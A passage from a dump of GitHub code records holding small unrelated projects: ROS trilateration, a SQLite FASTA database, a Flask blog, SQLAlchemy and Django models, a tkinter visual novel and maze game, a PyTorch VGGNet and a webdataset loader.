distance\n if MIN_RANGE < float(parsed_data[1]) < MAX_RANGE:\n #append respective arrays of the anchor found\n #list of anchor IDs found\n anchors.append(parsed_data[0])\n #list of distance between tag and anchors found\n ranges.append(parsed_data[1])\n #list of static TFs of the anchors found.\n transforms.append(get_transform(parsed_data[0]))\n anchors_found += 1\n\n #perform trilateration once enough anchors have been found\n if anchors_found == REQ_ANCHOR:\n #do trilateration\n pos = get_tag_location(anchors,ranges,transforms)\n\n #broadcast the transform\n br = tf.TransformBroadcaster()\n br.sendTransform((pos['x'], pos['y'], pos['z']),\n tf.transformations.quaternion_from_euler(0, 0, 0),\n rospy.Time.now(),\n FRAME_ID,\n \"map\")\n\n 
#TODO: Publish pos as geometry_msgs/PoseWithCovarianceStamped for EKF and only broadcast TF as an option.\n\n # clear lists once trilateration is done for the next cycle\n anchors_found = 0\n ranges = []\n transforms = []\n anchors = []\n","repo_name":"linorobot/ros_dwm1000","sub_path":"scripts/localize.py","file_name":"localize.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"53"} +{"seq_id":"6670900106","text":"import sqlite3\r\nimport os\r\nfrom .fasta_parser import FastaParser\r\nfrom pathlib import Path\r\n\r\nSUPER_ID = 0\r\nCLASS_ID = 1\r\nFAMILY_ID = 2\r\nSUBFAM_ID = 3\r\nGENUS_ID = 4\r\nSPECIES = 5\r\nFACTOR = 6\r\nCLASSIFICATION = 7\r\nSEQUENCE = 8\r\nCLASS_SEQ = 9\r\nFAMILY_SEQ = 10\r\nSUBFAM_SEQ = 11\r\n\r\nclass FastaDB:\r\n \"\"\"Database class which creates a sqlite database from fasta files \r\n and provides access to it \r\n\r\n \"\"\"\r\n\r\n def __init__(self, path):\r\n \"\"\"Constructor of FastaDB class, creates new sqlite database or connects to\r\n existing one\r\n \r\n Arguments:\r\n path {Path} -- path to the location where the database is or will be stored\r\n (if not created yet)\r\n\r\n Attributes:\r\n connection {connection object} -- represents the database\r\n cursor {cursor object} -- cursor to call execute methods on to perform SQL commands \r\n map {dict} -- representation of the name2ID.txt file, maps tf name to ID\r\n \"\"\"\r\n\r\n self.connection = sqlite3.connect(str(path))\r\n self.cursor = self.connection.cursor()\r\n self.map = {}\r\n # initialize map from name2ID file\r\n with open('src/fastas/name2ID.txt', 'r') as map_reader:\r\n for line in map_reader:\r\n nameToID = line.split(';')\r\n # make sure all names have the same case\r\n nameToID[0] = nameToID[0].upper()\r\n self.map[nameToID[0]] = nameToID[1][:len(nameToID[1])-len(\"\\n\")]\r\n \r\n def build_table(self):\r\n \"\"\"Creates the database table \r\n \r\n Table consists of:\r\n ID {integer} -- 5 values/columns\r\n species {text} -- species name\r\n factor {text} -- tf name\r\n classification {text} -- class e.g mammalia\r\n sequence {text} -- unaligned sequence of species tf\r\n class_seq {text} -- level 2 aligned\r\n family_seq {text} -- level 3 aligned\r\n subfam_seq {text} -- level 4 aligned\r\n PRIMARY KEY -- full ID + species name (unique entry)\r\n \"\"\"\r\n\r\n sql_name = \"\"\"CREATE TABLE IF NOT EXISTS fastas(\r\n super_id integer,\r\n class_id integer,\r\n family_id integer,\r\n subfam_id integer,\r\n genus_id integer,\r\n species text,\r\n factor text,\r\n classification text,\r\n sequence text,\r\n class_seq text,\r\n family_seq text,\r\n subfam_seq text,\r\n PRIMARY KEY(super_id, class_id, family_id, subfam_id, genus_id, species))\"\"\"\r\n self.cursor.execute(sql_name)\r\n # fill database with values\r\n self.populate()\r\n # save database via commit\r\n self.connection.commit()\r\n \r\n def factorToID(self, factor):\r\n \"\"\"gets corresponding ID to tf name\r\n \r\n Arguments:\r\n factor {string} -- name of transcription factor\r\n \r\n Returns:\r\n ids [list] -- full ID as array\r\n \"\"\"\r\n \r\n # fasta files are not consistent in their naming of transcription factors\r\n # make sure case matches \r\n factor = factor.upper() \r\n # try to match a factor in map\r\n while(factor not in self.map and len(factor) != 1):\r\n # reduce name each time by one place and try again until match is found\r\n factor = factor[:len(factor)-1]\r\n ids = self.map[factor].split('.')\r\n return 
ids\r\n\r\n def insert_query(self, fasta):\r\n \"\"\"takes fasta datum object and inserts its values into the database\r\n \r\n Arguments:\r\n fasta {Fasta} -- fasta datum\r\n \"\"\"\r\n\r\n arguments = \"(super_id, class_id, family_id, subfam_id, genus_id, species, factor, sequence, classification)\"\r\n # only insert if primary key entry does not exist yet\r\n query = \"INSERT OR IGNORE into fastas \" + arguments + \" VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\"\r\n # use tf name to get full ID including level 5\r\n ids = self.factorToID(fasta.get_factor())\r\n # execute insert query\r\n self.cursor.execute(query, (ids[0], ids[1], ids[2], ids[3], ids[4], fasta.get_fullspecies(), fasta.get_factor(), fasta.get_sequence(), fasta.get_class()))\r\n\r\n def update_query(self, fasta, size):\r\n \"\"\"update entries with sequences from aligned fasta files\r\n \r\n Arguments:\r\n fasta {Fasta} -- aligned fasta datum\r\n size {int} -- length of the id, used to get corresponding column (level) \r\n \"\"\"\r\n\r\n # make sure the corresponding entry does exist, if not create a new entry\r\n self.insert_query(fasta)\r\n begin = \"UPDATE fastas SET\"\r\n mid = \"WHERE super_id = ? AND class_id = ? AND family_id = ? AND subfam_id = ? AND genus_id = ?\"\r\n end = \"AND species = ?\"\r\n ids = self.factorToID(fasta.get_factor())\r\n # get correct column\r\n if size == 2:\r\n query = begin + \" class_seq = ? \" + mid + \" \" + end\r\n elif size == 3:\r\n query = begin + \" family_seq = ? \" + mid + \" \" + end\r\n elif size == 4: \r\n query = begin + \" subfam_seq = ? \" + mid + \" \" + end\r\n # execute update query\r\n self.cursor.execute(query, (fasta.get_sequence(), ids[0], ids[1], ids[2], ids[3], ids[4], fasta.get_fullspecies()))\r\n \r\n\r\n def fillTable(self, path, aligned):\r\n \"\"\"iterates over all fasta files in given directory and inserts them\r\n or updates their entries one by one \r\n \r\n Arguments:\r\n path {Path} -- path where fasta files are stored\r\n aligned {bool} -- true if aligned, false if not\r\n \"\"\"\r\n\r\n # iterate over all files in path directory\r\n for filename in path.iterdir():\r\n fn = str(filename)\r\n # creates new FastaParser object for file\r\n parser = FastaParser(fn)\r\n fn = filename.name\r\n fn = fn[:len(fn)-len(\".fasta\")]\r\n ids = fn.split('.')\r\n size = len(ids)\r\n # for every fasta datum in file\r\n for f in parser:\r\n # update aligned files, insert non-aligned\r\n if aligned:\r\n self.update_query(f, size)\r\n else:\r\n self.insert_query(f)\r\n\r\n def populate(self):\r\n \"\"\"small helper method that calls fillTable two times: non-aligned and\r\n aligned\r\n\r\n \"\"\"\r\n\r\n self.fillTable(Path('src/fastas/files'), False)\r\n self.fillTable(Path('src/fastas/files_aligned'), True)\r\n\r\n def writeToFile(self, fpath, column):\r\n \"\"\"creates a new fasta file and fills it with data where the cursor points to\r\n \r\n Arguments:\r\n fpath {Path} -- path where output file will be created\r\n column {int} -- column of sequence which is asked for (8-11 are possible values)\r\n \r\n Returns:\r\n fetch [bool] -- true if file was successfully created, false if not\r\n \"\"\"\r\n\r\n # delete file if it already exists\r\n if fpath.is_file():\r\n fpath.unlink()\r\n filename = str(fpath)\r\n fetch = False\r\n # write to file row for row\r\n for row in self.cursor:\r\n if not fetch:\r\n print(\"Generating file \" + filename[4:] + \" at ./\" + filename[:3])\r\n fetch = True\r\n with open(filename, 'a') as f:\r\n # description line\r\n 
f.write('>'+row[SPECIES]+\"_\"+row[FACTOR]+\"_\"+row[CLASSIFICATION]+'\\n')\r\n # sequence line\r\n f.write(row[column]+'\\n')\r\n return fetch\r\n\r\n def alignedQuery(self, ids, id_len):\r\n \"\"\"Takes and ID and creates an aligned query from it, which can then\r\n be used to get the corresponding data from the database\r\n \r\n Arguments:\r\n ids {list} -- ID of the node which is asked for\r\n id_len {int} -- length of the id, used to get the correct column\r\n \r\n Returns:\r\n query [list] -- aligned query \r\n \"\"\"\r\n\r\n path = ids[0]+'.'+ids[1]\r\n query = \" IS NOT NULL AND class_id=?\"\r\n # two digits\r\n if id_len == CLASS_ID:\r\n query = \" AND class_seq\" + query\r\n return (query, (ids[0],ids[1]), CLASS_SEQ, path)\r\n path += '.'+ids[2]\r\n query += \" AND family_id=?\"\r\n # three digits\r\n if id_len == FAMILY_ID:\r\n query = \" AND family_seq\" + query\r\n return (query, (ids[0],ids[1],ids[2]), FAMILY_SEQ, path)\r\n path += '.'+ids[3]\r\n query += \" AND subfam_id=?\"\r\n # four digits\r\n if id_len == SUBFAM_ID:\r\n # fourth digit is not a zero -> level 4 aligned\r\n if ids[3] != '0':\r\n query = \" AND subfam_seq\" + query\r\n return (query, (ids[0],ids[1],ids[2],ids[3]), SUBFAM_SEQ, path)\r\n else:\r\n # fourth digit is a zero -> level 3 aligned\r\n query = \" AND family_seq\" + query\r\n return (query, (ids[0],ids[1],ids[2],ids[3]), FAMILY_SEQ, path)\r\n path += '.'+ids[4]\r\n query += \" AND genus_id=?\"\r\n # five digits\r\n if id_len == GENUS_ID:\r\n # fourth digit is not a zero -> level 4 aligned\r\n if ids[3] != '0':\r\n query = \" AND subfam_seq\" + query\r\n return (query, (ids[0],ids[1],ids[2],ids[3],ids[4]), SUBFAM_SEQ, path)\r\n else:\r\n # fourth digit is a zero -> level 3 aligned\r\n query = \" AND family_seq\" + query\r\n return (query, (ids[0],ids[1],ids[2],ids[3],ids[4]), FAMILY_SEQ, path)\r\n\r\n def unalignedQuery(self, ids, id_len):\r\n \"\"\"Takes and ID and creates a non-aligned query from it, which can then\r\n be used to get the corresponding data from the database\r\n \r\n Arguments:\r\n ids {list} -- ID of the node which is asked for\r\n id_len {int} -- length of the id, used to get the correct column\r\n \r\n Returns:\r\n query [list] -- non-aligned query \r\n \"\"\"\r\n\r\n path = ids[0]+\"\"\r\n if id_len == SUPER_ID:\r\n return (\"\", (ids[0],), path)\r\n path += '.'+ids[1]\r\n query = \" AND class_id=?\"\r\n if id_len == CLASS_ID:\r\n return (query, (ids[0],ids[1]), path)\r\n path += '.'+ids[2]\r\n query += \" AND family_id=?\"\r\n if id_len == FAMILY_ID:\r\n return (query, (ids[0],ids[1],ids[2]), path)\r\n path += '.'+ids[3]\r\n query += \" AND subfam_id=?\"\r\n if id_len == SUBFAM_ID:\r\n return (query, (ids[0],ids[1],ids[2],ids[3]), path)\r\n path += '.'+ids[4]\r\n query += \" AND genus_id=?\"\r\n if id_len == GENUS_ID:\r\n return (query, (ids[0],ids[1],ids[2],ids[3],ids[4]), path)\r\n\r\n def get_node(self, node, aligned):\r\n \"\"\"retrieves data for given node and creates output for it\r\n \r\n Arguments:\r\n node {string} -- node which is asked for\r\n aligned {bool} -- true if aligned, false if non-aligned\r\n \r\n Returns:\r\n fetch [bool] -- true if successful, false if not\r\n \"\"\"\r\n\r\n output_path = Path('./out')\r\n ids = node.split('.')\r\n query = \"SELECT * FROM fastas WHERE super_id=?\"\r\n if aligned and len(ids) > 1:\r\n args = self.alignedQuery(ids, len(ids)-1)\r\n column = args[2]\r\n output_path = output_path / (args[3]+\"_mammalia_aligned_fasta.fasta\")\r\n else:\r\n args = self.unalignedQuery(ids, 
len(ids)-1)\r\n column = SEQUENCE\r\n output_path = output_path / (args[2]+\"_mammalia_fasta.fasta\")\r\n self.cursor.execute(query+args[0], args[1])\r\n return self.writeToFile(output_path, column) \r\n\r\n def get_species(self, species):\r\n \"\"\"retrieves data for given species and creates output for it\r\n \r\n Arguments:\r\n species {string} -- species which is asked for\r\n \r\n Returns:\r\n fetch [bool] -- true if successful, false if not\r\n \"\"\"\r\n\r\n output_path = Path('./out')\r\n query = \"SELECT * FROM fastas WHERE species=?\"\r\n self.cursor.execute(query,(species,))\r\n output_path = output_path / (species+\"_mammalia_fasta.fasta\")\r\n return self.writeToFile(output_path, SEQUENCE)","repo_name":"jvdmosel/FastaDB","sub_path":"src/fastas/fasta_db.py","file_name":"fasta_db.py","file_ext":"py","file_size_in_byte":12603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2266358669","text":"from . import mail\nfrom flask_mail import Message\nfrom .models import Blogpost\nfrom flask import Blueprint, render_template, request, flash, redirect, url_for\nfrom flask_login import login_required, current_user\n\nviews = Blueprint('views', __name__)\n@views.route('/', methods=['GET', 'POST'])\n@views.route('/home', methods=['GET', 'POST'])\n@login_required\ndef home():\n\tposts = Blogpost.query.all()\n\tposts.reverse()\n\treturn render_template('home.html', user=current_user, posts=posts)\n\n@views.route('/about')\ndef about():\n\treturn render_template('about.html', user=current_user)\n\n\n@views.route('/contact', methods=['GET', 'POST'])\n@login_required\ndef contact():\n\tif request.method == 'POST':\n\t\tname = current_user.first_name\n\t\temail = current_user.email\n\t\tphone = request.form.get('phone')\n\t\tmessage = request.form.get('message')\n\n\t\tmsg = Message(f'Contact from {name}',\n\t\t\t\t\t\tsender='contact@akramweb.com',\n\t\t\t\t\t\trecipients=['samielomrani73@gmail.com'])\n\t\tmsg.body = f\"\"\"{message}\\n\nemail : {email}\nPhone : {phone}\n\"\"\"\n\t\tmail.send(msg)\n\t\tflash(\"Your message has been sent we will response as soon as we can\", 'info')\n\t\treturn redirect(url_for('views.home'))\n\treturn render_template('contact.html', user=current_user)","repo_name":"Krim-dev/Flask-Blog","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11011024051","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nbusiness_ownership = db.Table('business_ownership',\n db.Column('user_id', db.Integer, db.ForeignKey('user.id'), primary_key=True),\n db.Column('business_id', db.Integer, db.ForeignKey('business.id'), primary_key=True)\n)\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(80), unique=False, nullable=False)\n email = db.Column(db.String(120), unique=True, nullable=False)\n password = db.Column(db.String(80), unique=False, nullable=False)\n houses = db.relationship('House', backref=\"user\", lazy=True)\n businesses = db.relationship('Business', secondary=business_ownership, back_populates=\"owners\", lazy=True)\n\n\n def __repr__(self):\n return '' % self.username\n\n def serialize(self):\n user_houses = [product.serialize() for product in self.houses]\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"email\": self.email,\n \"houses\": user_houses,\n }\n\nclass 
House(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n city = db.Column(db.String(120), unique=True, nullable=False)\n house_number = db.Column(db.Integer, unique=False, nullable=False)\n owner_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n\n def __repr__(self):\n return '' % self.house_number\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"city\": self.city,\n \"house_number\": self.house_number,\n \"owner_id\": self.owner_id,\n }\n\nclass Business(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), unique=True, nullable=False)\n description = db.Column(db.String(120), unique=True, nullable=False)\n owners = db.relationship('User', secondary=business_ownership, back_populates=\"businesses\", lazy=True)\n\n def __repr__(self):\n return '' % self.name\n\n def serialize(self):\n business_owners = [owner.serialize() for owner in self.owners]\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"owners\": business_owners,\n }\n","repo_name":"sergioadll/mini-final-project","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74213034089","text":"def prime_checker(number):\r\n devided_count=0\r\n for no in range(2,round(number/2)+1):\r\n if number % no == 0 :\r\n devided_count+=1\r\n\r\n if devided_count!=0 :\r\n print(f\"{number} isn't a prime number\")\r\n else :\r\n print(f\"{number} is a prime number\")\r\n \r\nn = int(input(\"Check this number: \"))\r\nprime_checker(number=n)\r\n\r\n\r\n\r\n","repo_name":"MaleeshaMadhuhansani99/Python100DayCording","sub_path":"Day08_PrimeNumber_Checker.py","file_name":"Day08_PrimeNumber_Checker.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30887280719","text":"import os\nimport tkinter as tk\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\nimport pygame\n\n# Initialize pygame mixer for playing background music\npygame.mixer.init()\n\n\ndef custom_sort_key(filename):\n parts = filename.split(\"_\") # Split the filename into parts using underscores\n second_part = parts[1] # Get the second part of the filename\n third_part = parts[2].split(\".\")[\n 0\n ] # Get the third part (remove the file extension)\n return int(second_part), int(third_part)\n\n\nclass VisualNovelApp:\n def __init__(self, root, image_directory):\n self.root = root\n self.root.title(\"Visual Novel\")\n self.image_directory = image_directory\n print(os.listdir(self.image_directory))\n # Get a list of image files in the specified directory\n self.image_files = sorted(\n [\n f\n for f in os.listdir(image_directory)\n if f.lower().endswith((\".png\", \".jpg\", \".jpeg\", \".gif\"))\n ],\n key=custom_sort_key,\n )\n self.current_image_index = 0\n\n # Load and display the first image\n self.load_image()\n\n # Load and play background music\n pygame.mixer.music.load(\"mixkit-hazy-after-hours-132.mp3\")\n pygame.mixer.music.set_volume(0.5)\n pygame.mixer.music.play(-1) # Loop infinitely\n\n # Create navigation buttons\n self.prev_button = ttk.Button(\n root, text=\"Previous\", style=\"NavButton.TButton\", command=self.prev_image\n )\n self.prev_button.pack(side=tk.LEFT, padx=10)\n self.next_button = ttk.Button(\n root, text=\"Next\", style=\"NavButton.TButton\", command=self.next_image\n )\n self.next_button.pack(side=tk.RIGHT, padx=10)\n\n # Bind 
arrow keys for navigation\n        self.root.bind(\"<Left>\", self.prev_image)\n        self.root.bind(\"<Right>\", self.next_image)\n\n        # Style for navigation buttons\n        style = ttk.Style()\n        style.configure(\"NavButton.TButton\", font=(\"Helvetica\", 12), padding=5)\n\n        # Bind F11 key to toggle full screen\n        self.root.bind(\"<F11>\", self.toggle_fullscreen)\n        self.root.bind(\"<Escape>\", self.exit_fullscreen)\n        self.fullscreen = False\n\n    def load_image(self):\n        if self.image_files:\n            image_path = os.path.join(\n                self.image_directory, self.image_files[self.current_image_index]\n            )\n            image = Image.open(image_path)\n            image.thumbnail(\n                (self.root.winfo_screenwidth(), self.root.winfo_screenheight())\n            )\n            photo = ImageTk.PhotoImage(image)\n\n            if hasattr(self, \"image_label\"):\n                self.image_label.config(image=photo)\n                self.image_label.image = photo\n            else:\n                self.image_label = ttk.Label(self.root, image=photo)\n                self.image_label.pack()\n            self.image_label.photo = photo\n\n    def prev_image(self, event=None):\n        if self.image_files:\n            self.current_image_index = (self.current_image_index - 1) % len(\n                self.image_files\n            )\n            self.load_image()\n\n    def next_image(self, event=None):\n        if self.image_files:\n            self.current_image_index = (self.current_image_index + 1) % len(\n                self.image_files\n            )\n            self.load_image()\n\n    def toggle_fullscreen(self, event=None):\n        self.fullscreen = not self.fullscreen\n        self.root.attributes(\"-fullscreen\", self.fullscreen)\n        self.load_image()\n\n    def exit_fullscreen(self, event=None):\n        self.fullscreen = False\n        self.root.attributes(\"-fullscreen\", False)\n        self.load_image()\n\n\nif __name__ == \"__main__\":\n    image_directory = \"VN_Images\"\n    root = tk.Tk()\n    app = VisualNovelApp(root, image_directory)\n    root.mainloop()\n","repo_name":"abhiram1809/VN_Game_Generator","sub_path":"VN_pygame player.py","file_name":"VN_pygame player.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33485468292","text":"from django.db import models\nfrom sites.models import sites\nfrom django.core.validators import MaxLengthValidator\n\n\n# Create your models here.\nclass subjects(models.Model):\n    site = models.ForeignKey(sites, on_delete=models.CASCADE)\n    name = models.CharField(max_length=64,\n                            blank=False,\n                            null=False)\n    row_id = models.IntegerField(null=True, blank=True)\n    row_prefix = models.CharField(max_length=64, null=True, blank=True)\n\n","repo_name":"Bombozaur666/gallery_app","sub_path":"src/subjects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41189606767","text":"import torch.nn as nn\n\nLAYERS_INFO = {\n    'A': [[1, 1, 2, 2, 2], []],\n    'B': [[2, 2, 2, 2, 2], []],\n    'C': [[2, 2, 3, 3, 3], ['3_3', '4_3', '5_3']],\n    'D': [[2, 2, 3, 3, 3], []],\n    'E': [[2, 2, 4, 4, 4], []]\n    }\n\ndef conv_block(in_f, out_f, *args, **kwargs):\n    return nn.Sequential(\n        nn.Conv2d(in_f, out_f, *args, **kwargs),\n        nn.BatchNorm2d(out_f),\n        nn.ReLU()\n    )\n\ndef conv_layer(block_info):\n    block_list = [conv_block(in_f, out_f, kernel_size=k, padding=p)\n                  for in_f, out_f, k, p in block_info]\n    block_list.append(nn.MaxPool2d(2, stride=2))\n    return nn.Sequential(*block_list)\n\nclass VGGNet(nn.Module):\n    \n    def __init__(self, config='A', num_classes=1000, img_size=224):\n        super(VGGNet, self).__init__()\n        self.config = config\n        self.num_classes = num_classes\n        self.layer_info = LAYERS_INFO[self.config]\n        \n        
block_infos = self.get_block_infos()\n        self.encoder = nn.Sequential(*[conv_layer(block_info) for block_info in block_infos])\n\n        self.decoder = nn.Sequential(\n            nn.Linear((img_size // 32) * (img_size // 32) * 512, 4096),\n            nn.ReLU(),\n            nn.Dropout(p=0.5),\n            nn.Linear(4096, 4096),\n            nn.ReLU(),\n            nn.Dropout(p=0.5),\n            nn.Linear(4096, self.num_classes))\n\n        self.initialize_weights()\n    \n    def get_block_infos(self):\n        enc_sizes = [3, 64, 128, 256, 512, 512]\n        \n        block_infos = list()\n        for l_idx, cnt in enumerate(self.layer_info[0]):\n            block_info = list()\n            for c_idx in range(cnt):\n                in_f, out_f = l_idx + int(bool(c_idx)), l_idx + 1\n                if f'{l_idx+1}_{c_idx+1}' in self.layer_info[1]:\n                    block_info.append((enc_sizes[in_f], enc_sizes[out_f], 1, 0))\n                else:\n                    block_info.append((enc_sizes[in_f], enc_sizes[out_f], 3, 1))\n            block_infos.append(block_info)\n        \n        return block_infos\n    \n    def initialize_weights(self):\n        for m in self.modules():\n            # apply He initialization to the convolution kernel weights.\n            if isinstance(m, nn.Conv2d):\n                nn.init.normal_(m.weight, mean=0, std=0.1)\n                \n                # initialize the bias to the constant 0.\n                if m.bias is not None:\n                    nn.init.constant_(m.bias, 0)\n            \n            elif isinstance(m, nn.BatchNorm2d):\n                nn.init.constant_(m.weight, 1)\n                nn.init.constant_(m.bias, 0)\n            \n            elif isinstance(m, nn.Linear):\n                nn.init.kaiming_uniform_(m.weight)\n                nn.init.constant_(m.bias, 0)    \n    \n    def forward(self, inputs):\n        out = self.encoder(inputs)\n        out = out.view(out.size(0), -1)\n        out = self.decoder(out)\n        return out","repo_name":"RyuDongIl/PyTorch-Model-Study","sub_path":"VGGNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74789824807","text":"import sys\nfrom itertools import combinations\ninput = lambda: sys.stdin.readline().rstrip()\nvowels = ['a', 'e', 'i', 'o', 'u']\nl, c = map(int, input().split())\na = input().split()\na.sort()\n\ncomb = list(combinations(a, l))\n\nfor c in comb:\n    count = 0\n    for x in c:\n        if x in vowels:\n            count += 1\n    \n    if 1 <= count <= l-2:\n        print(''.join(c))","repo_name":"deltaori0/Python-Algorithm","sub_path":"baekjoon/브루트포스/1759.py","file_name":"1759.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26503694341","text":"import tkinter\nimport tkinter as Tk\nfrom tracemalloc import start\nimport maze_maker as mm\n\ndef key_down(event): #handler for key press\n    global key\n    key = event.keysym\n\ndef key_up(event): #handler for key release\n    global key\n    key = \"\"\n\ndef main_proc(): #control function for Koukaton\n    global cx, cy,mx,my\n    delta = { #pressed key 'key' / value: movement offset list [x,y]\n        \"\" :[0,0],\n        \"Up\" :[0, -1],\n        \"Down\" :[0, +1],\n        \"Left\" :[-1, 0],\n        \"Right\" :[+1,0],\n        \n    }\n    try:\n        if maze_bg[my+delta[key][1]][mx+delta[key][0]] == 0: #floor is 0, so the move is allowed\n            my,mx = my+delta[key][1],mx+delta[key][0]\n    except:\n        pass\n    cx,cy = 100*mx+50,100*my+50 #move one cell at a time\n    canvas.coords(\"tori\", cx, cy)\n    root.after(150, main_proc) #move every 150 ms\n\nif __name__ == \"__main__\":\n    root = tkinter.Tk()\n    root.title(\"迷えるこうかとん\")\n\n    canvas = Tk.Canvas(root,width=1500,height=900,bg=\"black\")\n    canvas.pack()\n    maze_bg = mm.make_maze(15,9) #generates 1: wall / 0: floor\n    mm.show_maze(canvas,maze_bg)\n\n    tori = Tk.PhotoImage(file = \"fig/7.png\") #change Koukaton to No.7\n    mx,my = 1,1 #set the initial position\n    cx,cy = 100*mx+50,100*my+50\n    canvas.create_image(cx,cy,image=tori,tag=\"tori\")\n\n    goal = Tk.PhotoImage(file = \"fig/goal_tape.png\") #set up the goal\n    
canvas.create_image(1350,750,image=goal,tag=\"goal\")\n\n    Start = Tk.PhotoImage(file = \"fig/text_start.png\") #set up the start marker\n    canvas.create_image(cx,cy,image=Start,tag=\"Start\")\n\n\n    key = \"\"\n\n    main_proc()\n    \n    root.bind(\"<KeyPress>\",key_down)\n    root.bind(\"<KeyRelease>\",key_up)\n    root.mainloop()","repo_name":"mattha-082111/ProjExD","sub_path":"ex03/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71248421609","text":"import logging\nimport random\nimport sys\nfrom dataclasses import dataclass\nfrom multiprocessing import Value\nimport time\nimport webdataset as wds\nfrom PIL import Image\nfrom torch.utils.data import DataLoader, IterableDataset, get_worker_info\nfrom torch.utils.data.distributed import DistributedSampler\nfrom webdataset.tariterators import (\n    base_plus_ext,\n    tar_file_expander,\n    url_opener,\n    valid_sample,\n)\n\nImage.MAX_IMAGE_PIXELS = 1000000000\nLAION2B_NUM_SAMPLE = 1500000000\nVQAV2_TRAIN_NUM_SAMPLE = 1828467\nVG_RELATION_BBOX_SIZE = 600\n\n\nclass SharedEpoch:\n    def __init__(self, epoch: int = 0):\n        self.shared_epoch = Value(\"i\", epoch)\n\n    def set_value(self, epoch):\n        self.shared_epoch.value = epoch\n\n    def get_value(self):\n        return self.shared_epoch.value\n\n\n@dataclass\nclass DataInfo:\n    dataloader: DataLoader\n    sampler: DistributedSampler = None\n    shared_epoch: SharedEpoch = None\n\n    def set_epoch(self, epoch):\n        if self.shared_epoch is not None:\n            self.shared_epoch.set_value(epoch)\n        if self.sampler is not None and isinstance(self.sampler, DistributedSampler):\n            self.sampler.set_epoch(epoch)\n\n\ndef filter_no_caption_or_no_image(sample):\n    return (\"txt\" in sample) and (\n        \"png\" in sample or \"jpg\" in sample or \"jpeg\" in sample\n    )\n\n\ndef log_and_continue(exn):\n    \"\"\"Call in an exception handler to ignore any exception, issue a warning, and continue.\"\"\"\n    # if \"ValueError\" in repr(exn) or \"KeyError\" in repr(exn):  # Avoid spamming logs with these\n    #     return True\n    logging.info(f\"Handling webdataset error ({repr(exn)}). 
Ignoring.\")\n return True\n\n\ndef group_by_keys_nothrow(\n data, keys=base_plus_ext, lcase=True, suffixes=None, handler=None\n):\n \"\"\"Return function over iterator that groups key, value pairs into samples.\n\n :param keys: function that splits the key into key and extension (base_plus_ext)\n :param lcase: convert suffixes to lower case (Default value = True)\n \"\"\"\n current_sample = None\n for filesample in data:\n assert isinstance(filesample, dict)\n fname, value = filesample[\"fname\"], filesample[\"data\"]\n prefix, suffix = keys(fname)\n if prefix is None:\n continue\n if lcase:\n suffix = suffix.lower()\n # FIXME webdataset version throws if suffix in current_sample, but we have a potential for\n # this happening in the current LAION400m dataset if a tar ends with same prefix as the next\n # begins, rare, but can happen since prefix aren't unique across tar files in that dataset\n if (\n current_sample is None\n or prefix != current_sample[\"__key__\"]\n or suffix in current_sample\n ):\n if valid_sample(current_sample):\n yield current_sample\n current_sample = dict(__key__=prefix, __url__=filesample[\"__url__\"])\n if suffixes is None or suffix in suffixes:\n current_sample[suffix] = value\n if valid_sample(current_sample):\n yield current_sample\n\n\ndef tarfile_to_samples_nothrow(src, handler=log_and_continue):\n # NOTE this is a re-impl of the webdataset impl with group_by_keys that doesn't throw\n streams = url_opener(src, handler=handler)\n files = tar_file_expander(streams, handler=handler)\n samples = group_by_keys_nothrow(files, handler=handler)\n return samples\n\n\ndef pytorch_worker_seed(increment=0):\n \"\"\"get dataloader worker seed from pytorch\"\"\"\n worker_info = get_worker_info()\n if worker_info is not None:\n # favour using the seed already created for pytorch dataloader workers if it exists\n seed = worker_info.seed\n if increment:\n # space out seed increments so they can't overlap across workers in different iterations\n seed += increment * max(1, worker_info.num_workers)\n return seed\n # fallback to wds rank based seed\n return wds.utils.pytorch_worker_seed()\n\n\n_SHARD_SHUFFLE_SIZE = 2000\n_SHARD_SHUFFLE_INITIAL = 500\n_SAMPLE_SHUFFLE_SIZE = 5000\n_SAMPLE_SHUFFLE_INITIAL = 1000\n\n\nclass ResampledShards2(IterableDataset):\n \"\"\"An iterable dataset yielding a list of urls.\"\"\"\n\n def __init__(\n self,\n urls,\n nshards=sys.maxsize,\n worker_seed=None,\n deterministic=False,\n epoch=-1,\n ):\n \"\"\"Sample shards from the shard list with replacement.\n :param urls: a list of URLs as a Python list or brace notation string\n \"\"\"\n super().__init__()\n urls = wds.shardlists.expand_urls(urls)\n self.urls = urls\n assert isinstance(self.urls[0], str)\n self.nshards = nshards\n self.rng = random.Random()\n 